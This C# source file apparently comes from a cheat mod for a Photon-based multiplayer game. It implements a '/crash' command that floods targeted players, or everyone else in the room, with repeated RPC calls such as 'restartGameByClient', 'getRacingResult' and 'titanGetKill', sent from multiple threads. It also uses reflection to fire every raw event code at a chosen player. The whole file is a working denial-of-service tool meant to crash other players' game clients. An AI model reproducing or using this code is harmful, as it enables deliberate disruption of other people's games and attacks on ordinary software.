//------------------------------------------------------------------------------
// <auto-generated>
//     O código foi gerado por uma ferramenta.
//     Versão de Tempo de Execução:4.0.30319.18444
//
//     As alterações ao arquivo poderão causar comportamento incorreto e serão perdidas se
//     o código for gerado novamente.
// </auto-generated>
//------------------------------------------------------------------------------
using System;
using System.Reflection;
using System.Threading;
public class CrashCmd : ICommand{
	private string[] help = {
		"/crash <id>",
		"/crash <id> <threads> <calls per thread>",
		"/crash -m <id> <threads> <calls per thread>",
		"/crash -t [id]"
	};
	public bool cmd (string[] args, FengGameManagerMKII gm){
		if (args.Length == 0){
			ModMain.instance.sendToPlayer(this.help);
			return true;
		}

		if (args[0].Equals("-t")){
			CrashCmd.doCrash3((args.Length > 1) ? int.Parse(args[1]) : -1);
			return true;
		}

		int index = (args[0].Equals("-m") ? 1 : 0);
		int id  = int.Parse(args[index]);


		try{
			//this.crashPlayer(id);
			PhotonPlayer player = null;
			foreach(PhotonPlayer p in PhotonNetwork.playerList){
				if (p.ID == id){
					player = p;
					break;
				}
			}

			int threads = 2;
			int amount = 512;

			if (args.Length >= 3){
				try{
					threads = int.Parse(args[index + 1]);
					amount = int.Parse(args[index + 2]);
				}catch(System.Exception){

				}
			}
			if (player != null){
				if (index == 1){
					CrashCmd.doCrash2(player, threads, amount);
				}else{
					CrashCmd.doCrash(player, threads, amount, "restartGameByClient");
				}
			}
			return true;
		}catch(System.Exception e){
			ModMain.instance.log(e);
			return false;
		}
	}

	private void crashPlayer(int id){
		Type type = typeof(PhotonNetwork);
#if DEBUG
		ModMain.instance.debug("Got the PhotonNetwork type");
#endif
		FieldInfo networkingPeerField = type.GetField("networkingPeer", BindingFlags.Static | BindingFlags.NonPublic);
		object networkingPeer = networkingPeerField.GetValue(null);
		RaiseEventOptions opts = new RaiseEventOptions();
		opts.TargetActors = new int[]{id};
#if DEBUG
		ModMain.instance.debug("Networking peer: " + networkingPeer);
		ModMain.instance.debug("got the networkPeer value");
#endif
		/*
		MethodInfo raiseOpMethod = networkingPeer.GetType().GetMethod("OpRaiseEvent", 
		                                                              BindingFlags.Instance | BindingFlags.Public,
		                                                              null,
		                                                              new Type[]{typeof(Byte), typeof(Hashtable), typeof(Boolean), typeof(Byte), typeof(Int32[])},
																	  null);
		*/
		MethodInfo raiseOpMethod = getRaiseEventMethod(networkingPeer);
#if DEBUG
		ModMain.instance.debug("got the RaiseOp method");
		ModMain.instance.debug("Method: " + raiseOpMethod);
#endif
		try{
			for(int i = 0; i < 255; i++){
				ModMain.instance.log("Sending : " + i);
				raiseOpMethod.Invoke(networkingPeer, new object[]{(byte)i, null, true, opts});
			}
		}catch(Exception e){
			ModMain.instance.log(e);
		}
#if DEBUG
		ModMain.instance.debug("After invoke of the RaiseOP method");
#endif
	}
	
	private  MethodInfo getRaiseEventMethod(object nwp){
		MethodInfo[] methods = nwp.GetType().GetMethods();
#if DEBUG
		ModMain.instance.debug("Methods in the NetworkingPeer: ");
#endif
		foreach (MethodInfo method in methods){
			if (method.Name == "OpRaiseEvent" && method.GetParameters().Length == 4){
				return method;
			}
		}
		
		return null;
	}

	public static void doCrash3(int player){
		new Thread(() =>{
			FengGameManagerMKII gm = ModMain.instance.getGameManager();
			object[] args = new object[]{null, -1, ""};
			while(PhotonNetwork.inRoom){
				if (player != -1){
					PhotonPlayer p = PhotonPlayer.Find(player);
					if (p != null){
						for(int i = 0; i < 5; i++){
							gm.photonView.RPC("titanGetKill", p, args);
						}
					}else{
						return;
					}
				}else{
					for(int i = 0; i < 5; i++){
						gm.photonView.RPC("titanGetKill", PhotonTargets.Others, args);
					}
				}
				Thread.Sleep(100);
			}
			
		}).Start();
	}

	public static void doCrash2(PhotonPlayer player, int threads, int amount){
		//for (int i = 0; i < threads; i++){
			new Thread(() =>{
				FengGameManagerMKII gm = ModMain.instance.getGameManager();
				Random r = new Random();
				string name = ModMain.instance.getNameChanger().generateRandomUnicode(16);
				while(PhotonNetwork.inRoom){
					if (PhotonPlayer.Find(player.ID) == null){
						break;
					}

					for(int i = 0; i < 30; i++){
						gm.photonView.RPC("getRacingResult", player, name, (float)r.NextDouble());
					}
					Thread.Sleep(100);
				}
				
			}).Start();
		//}
	}
	public static void doCrash(PhotonPlayer player, int threads, int amount, string method){
		for (int i = 0; i < threads; i++){
			new Thread(() =>{
				FengGameManagerMKII gm = ModMain.instance.getGameManager();
				for (int j = 0; j < amount; j++){
					gm.photonView.RPC(method, player, null);
				}
			}).Start();
		}
	}
}

